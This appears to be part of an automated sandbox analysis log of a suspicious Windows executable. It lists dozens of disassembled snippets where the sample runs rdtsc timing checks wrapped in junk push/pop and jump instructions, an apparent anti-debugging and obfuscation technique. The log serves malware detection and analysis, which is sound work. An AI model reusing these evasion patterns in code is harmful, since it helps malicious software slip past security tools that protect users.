Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD1516 second address: BD1532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC064DD4F76h 0x00000009 jo 00007FC064DD4F76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FC064DD4F76h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD1F95 second address: BD1F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD3B1D second address: BD3B59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007FC064DD4F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC064DD4F8Dh 0x00000012 pushad 0x00000013 jmp 00007FC064DD4F7Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD3B59 second address: BD3B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD3B5D second address: BD3B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC064DD4F81h 0x0000000d jnp 00007FC064DD4F76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD55A0 second address: BD55AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jbe 00007FC064DA37C0h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD6168 second address: BD616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD637E second address: BD6384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD616D second address: BD6173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BD6384 second address: BD6389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDB203 second address: BDB209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDA328 second address: BDA32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDC1E2 second address: BDC203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC064DD4F84h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDB424 second address: BDB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDC203 second address: BDC209 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDB428 second address: BDB42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDC209 second address: BDC20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDD216 second address: BDD21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDC39A second address: BDC3A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDE207 second address: BDE21C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC064DA37BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BDE537 second address: BDE53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE25AF second address: BE25BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE06D6 second address: BE06E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC064DD4F76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE25BE second address: BE25CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC064DA37B8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE06E8 second address: BE0768 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC064DD4F78h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov eax, dword ptr [ebp+122D1699h] 0x00000038 call 00007FC064DD4F82h 0x0000003d mov edi, dword ptr [ebp+122D3A5Dh] 0x00000043 pop edi 0x00000044 push FFFFFFFFh 0x00000046 mov edi, dword ptr [ebp+122D3A8Dh] 0x0000004c nop 0x0000004d jmp 00007FC064DD4F84h 0x00000052 push eax 0x00000053 pushad 0x00000054 push edi 0x00000055 pushad 0x00000056 popad 0x00000057 pop edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE0768 second address: BE076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B96A6D second address: B96A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B96A72 second address: B96A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnl 00007FC064DA37B6h 0x0000000c jnp 00007FC064DA37B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B96A86 second address: B96A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE2AFB second address: BE2B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE2B13 second address: BE2B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC064DD4F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 je 00007FC064DD4F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE3B8F second address: BE3B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE3B96 second address: BE3C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F88h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e add dword ptr [ebp+122D23A8h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FC064DD4F78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 sub dword ptr [ebp+1244594Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FC064DD4F78h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 xor dword ptr [ebp+122D2E5Fh], edx 0x00000058 xchg eax, esi 0x00000059 push ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jne 00007FC064DD4F76h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE4B26 second address: BE4B30 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC064DA37BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6B54 second address: BE6B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6B59 second address: BE6B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6B70 second address: BE6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FC064DD4F78h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D3AD5h] 0x00000030 adc bh, FFFFFFD7h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FC064DD4F78h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jg 00007FC064DD4F7Bh 0x00000055 jmp 00007FC064DD4F88h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 pop ecx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE4CEE second address: BE4CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE7A2C second address: BE7A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE7A31 second address: BE7A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6D83 second address: BE6D93 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6D93 second address: BE6DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37C7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6DAF second address: BE6DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC064DD4F76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE6DBA second address: BE6E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, 2500h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC064DA37B8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d or ebx, 1C856A04h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D2E5Bh], edx 0x00000040 mov dword ptr [ebp+122D372Eh], esi 0x00000046 mov eax, dword ptr [ebp+122D05B1h] 0x0000004c sub bx, AE9Dh 0x00000051 mov bh, B8h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007FC064DA37B8h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f or dword ptr [ebp+124531E5h], edx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jns 00007FC064DA37B6h 0x0000007f jnc 00007FC064DA37B6h 0x00000085 popad 0x00000086 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE7D3F second address: BE7D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE7D43 second address: BE7D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE8E21 second address: BE8E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC064DD4F82h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BE8F37 second address: BE8F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BEB020 second address: BEB024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BEB024 second address: BEB028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B919B0 second address: B919B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B919B6 second address: B919C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BF3C48 second address: BF3C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BF3C4C second address: BF3C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC064DA37BCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAC92 second address: BFAC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAD4B second address: BFAD58 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAD58 second address: BFAD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FC064DD4F84h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAE1E second address: BFAE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAE24 second address: BFAE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DD4F7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFAE35 second address: BFAE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BFCCE6 second address: BFCD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FC064DD4F84h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02EC2 second address: C02EF7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC064DA37C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC064DA37C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02191 second address: C0219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C023FE second address: C02402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02402 second address: C02420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FC064DD4F82h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C026F6 second address: C02710 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FC064DA37B6h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02710 second address: C02739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jmp 00007FC064DD4F88h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02739 second address: C0273D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02CAB second address: C02D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DD4F7Bh 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 jmp 00007FC064DD4F82h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 jbe 00007FC064DD4F76h 0x0000001f jmp 00007FC064DD4F7Fh 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC064DD4F80h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C02D01 second address: C02D1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC064DA37B6h 0x00000008 jmp 00007FC064DA37C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8FEB0 second address: B8FED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FC064DD4F78h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FC064DD4F88h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8FED8 second address: B8FEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C0C551 second address: C0C55D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC064DD4F76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C0C6E3 second address: C0C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C0CA1E second address: C0CA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FC064DD4F89h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C0D3E0 second address: C0D3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11BE0 second address: C11BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11BE6 second address: C11BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11BEA second address: C11C14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F81h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC064DD4F7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11C14 second address: C11C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11C18 second address: C11C22 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11E9F second address: C11EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: C11EA5 second address: C11EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC064DD4F82h 0x0000000b rdtsc
